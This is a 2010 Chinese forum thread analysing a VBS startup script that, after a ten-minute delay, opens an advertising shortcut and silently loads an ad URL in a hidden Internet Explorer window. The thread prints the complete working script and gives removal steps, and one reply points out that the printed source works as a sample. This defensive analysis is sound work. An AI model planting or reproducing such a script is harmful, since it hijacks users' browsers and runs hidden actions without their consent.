自动弹出网页的恶意脚本分析
by:riuskskblog:[url]http://riusksk.blogbus.com[/url]
这几天在开机后,都会自动弹出一个广告网站,在注册表中搜索弹出的网页,无果而返,接着再看了一下启动项,发现个VBS脚本文件,如下图:
[attach]33256[/attach]
找到这个脚本文件后,用记事本打开,代码如下:
[color=#008000]00000:[/color] [color=#0000D0]On[/color] [color=#0000D0]Error[/color] [color=#0000D0]Resume[/color] [color=#0000D0]Next[/color]
[color=#008000]00001:[/color] [color=#0000D0]Dim[/color] Fso,wss,HKRegStr
[color=#008000]00002:[/color] [color=#0000D0]Set[/color] Fso= [color=#FF0000]CreateObject[/color]([color=#808080]"Scripting.FileSystemObject"[/color])
[color=#008000]00003:[/color] [color=#0000D0]Set[/color] wss=[color=#FF0000]CreateObject[/color]([color=#808080]"WScript.Shell"[/color])
[color=#008000]00004:[/color] HKRegStr=wss.RegRead([color=#808080]"HKEY_CURRENT_USER\Software\Maxthon2\Folder"[/color])
[color=#008000]00005:[/color] [color=#0000D0]if[/color] HKRegStr<>[color=#808080]""[/color] [color=#0000D0]then[/color]
[color=#008000]00006:[/color] HKRegStr=HKRegStr+[color=#808080]"\Maxthon.exe"[/color] [color=#008000]'默认使用傲游浏览器打开网站[/color]
[color=#008000]00007:[/color] [color=#0000D0]if[/color] (Fso.FileExists(HKRegStr)) [color=#0000D0]then[/color]
[color=#008000]00008:[/color] wscript.[b][color=#000080]sleep[/color][/b] 600000 [color=#008000]'脚本运行10分钟之后再打开网站[/color]
[color=#008000]00009:[/color] [color=#008000]'网址之家.url是一个快捷方式文件,指向[url]http://www.so02.cn/?sid=1[/url],如下图所示:[/color]
[attach]33257[/attach]
[color=#008000]00010:[/color] [color=#FF0000]CreateObject[/color]([color=#808080]"WScript.Shell"[/color]).run [color=#808080]""[/color][color=#808080]""[/color] & HKRegStr &[color=#808080]""[/color][color=#808080]" C:\Windows\system32\网址之家.url"[/color],x,ture
[color=#008000]00011:[/color] [color=#0000D0]set[/color] ie=WScript.[color=#FF0000]createobject[/color]([color=#808080]"internetexplorer.application"[/color])
[color=#008000]00012:[/color] ie.visible = 0
[color=#008000]00013:[/color] ie.navigate [color=#808080]"http://qw.ad29.com/ji.asp"[/color] [color=#008000]'接着再打开这个网址[/color]
[color=#008000]00014:[/color] wscript.[b][color=#000080]sleep[/color][/b] 10000 [color=#008000]'暂时10秒[/color]
[color=#008000]00015:[/color] ie.quit
[color=#008000]00016:[/color] [color=#0000D0]else[/color]
[color=#008000]00017:[/color] [color=#008000]'假如没有注册表中指定的Maxthon.exe,则用默认浏览器打开网址之家.url,也就是[url]http://www.so02.cn/?sid=1[/url][/color]
[color=#008000]00018:[/color] wscript.[b][color=#000080]sleep[/color][/b] 600000
[color=#008000]00019:[/color] [color=#FF0000]CreateObject[/color]([color=#808080]"WScript.Shell"[/color]).run[color=#808080]" C:\Windows\system32\网址之家.url"[/color],x,ture
[color=#008000]00020:[/color] [color=#0000D0]end[/color] [color=#0000D0]if[/color]
[color=#008000]00021:[/color] [color=#0000D0]else[/color]
[color=#008000]00022:[/color] [color=#008000]'假如注册表HKEY_CURRENT_USER\Software\Maxthon2\Folder无键值,则10分钟后打开网址之家.url[/color]
[color=#008000]00023:[/color] wscript.[b][color=#000080]sleep[/color][/b] 600000
[color=#008000]00024:[/color] [color=#FF0000]CreateObject[/color]([color=#808080]"WScript.Shell"[/color]).run [color=#808080]"C:\Windows\system32\网址之家.url"[/color] ,x,ture
[color=#008000]00025:[/color] [color=#0000D0]end[/color] [color=#0000D0]if[/color]
清除方法:去掉启动项中的网址之家.vbs并将其删除,再将 C:\Windows\system32\网址之家.url 也清除,重启之后搞定。 每次都能坐泉哥的大...打我PG我不乖...。O(∩_∩)O哈哈~ 支持楼主 学习了 谢谢 这个方法是很不错!学习了! 前段时间被这东西这么了很长时间。总是莫名的修改主页。悄悄的修改,真是让人郁闷。多谢LZ分享 学习了 谢谢:D: [i=s] 本帖最后由 riusksk 于 2010-3-2 13:47 编辑 [/i]
[quote]每次都能坐泉哥的大...打我PG我不乖...。O(∩_∩)O哈哈~
[size=2][color=#999999]jerrynpc 发表于 2010-3-2 02:04[/color] [url=http://unpack.cn/redirect.php?goto=findpost&pid=611685&ptid=46572][img]http://unpack.cn/images/common/back.gif[/img][/url][/size][/quote]
两点起来占...打我PG我不乖...,你也太有才了吧
一时没注意,你也有10UF,恭喜早日升官发财:lol 学习一下! [quote]两点起来占...打我PG我不乖...,你也太有才了吧
一时没注意,你也有10UF,恭喜早日升官发财
[size=2][color=#999999]riusksk 发表于 2010-3-2 12:58[/color] [url=http://www.unpack.cn/redirect.php?goto=findpost&pid=611948&ptid=46572][img]http://www.unpack.cn/images/common/back.gif[/img][/url][/size][/quote]
谢谢泉哥,今天心情不错。暂时不鄙视你了。
一个vbs还搞这么复杂干啥啊 [quote]谢谢泉哥,今天心情不错。暂时不鄙视你了。
一个vbs还搞这么复杂干啥啊
[size=2][color=#999999]jerrynpc 发表于 2010-3-2 15:50[/color] [url=http://unpack.cn/redirect.php?goto=findpost&pid=612043&ptid=46572][img]http://unpack.cn/images/common/back.gif[/img][/url][/size][/quote]
记录一下,顺便更新博客嘛:lol 学习一下。。 [quote]标题:自动弹出网页的恶意脚本分析
链接:[url]http://www.unpack.cn/viewthread.php?tid=46572[/url]
贴者:riusksk
日期: 2010-3-2 00:47 [/quote] 这类恶意改首页的,真是千奇百怪,
什么样的方式都有啊。
急需要一个救世主。来拯救广大网友了。。 也不知道这脚本是浏览哪个网站中标的,安装个HIPS,觉得还是有必要的,不然有些杀软有昨根本派不上用场,用HIPS还可以查看日志,任何文件,注册表操作……都会记录的,容易查出病毒木马,只不过得自己手杀,呵呵 我爱Upack论坛 学习了 谢谢 晚来的支持啊,牛啊,发展迅猛 不错,分析得不错。。 有样本不啊? [quote]有样本不啊?
[size=2][color=#999999]hxu 发表于 2010-4-4 21:14[/color] [url=http://unpack.cn/redirect.php?goto=findpost&pid=637602&ptid=46572][img]http://unpack.cn/images/common/back.gif[/img][/url][/size][/quote]
源码不是都给了,保存为vbs文件不就是样本了 学习了 谢谢 脚本啊 。。。。。。。。
页:
[1]